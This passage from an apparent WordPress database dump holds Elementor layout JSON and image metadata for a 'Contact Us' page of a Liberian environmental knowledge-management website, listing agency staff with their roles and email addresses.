llax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14896,2365,'_wp_attached_file','2019/11/knowledge_broker_JJ.jpg'),(14897,2365,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:31:\"2019/11/knowledge_broker_JJ.jpg\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"knowledge_broker_JJ-300x279.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"knowledge_broker_JJ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P530\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1549135302\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"15.2\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:4:\"0.02\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(14898,2366,'_elementor_edit_mode','builder'),(14899,2366,'_elementor_template_type','wp-page'),(14900,2366,'_elementor_version','2.7.5'),(14901,2366,'_wp_page_template','default'),(14902,2366,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer, EPA<br>\\n\\nUNCBD Focal Point<br>\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong><br>\\n\\nMEAs Coordinator, EPA<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\nGIS Coordinator, EPA<br>\\nUNCCD Focal Point<br>\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement, EPA<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA, EPA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_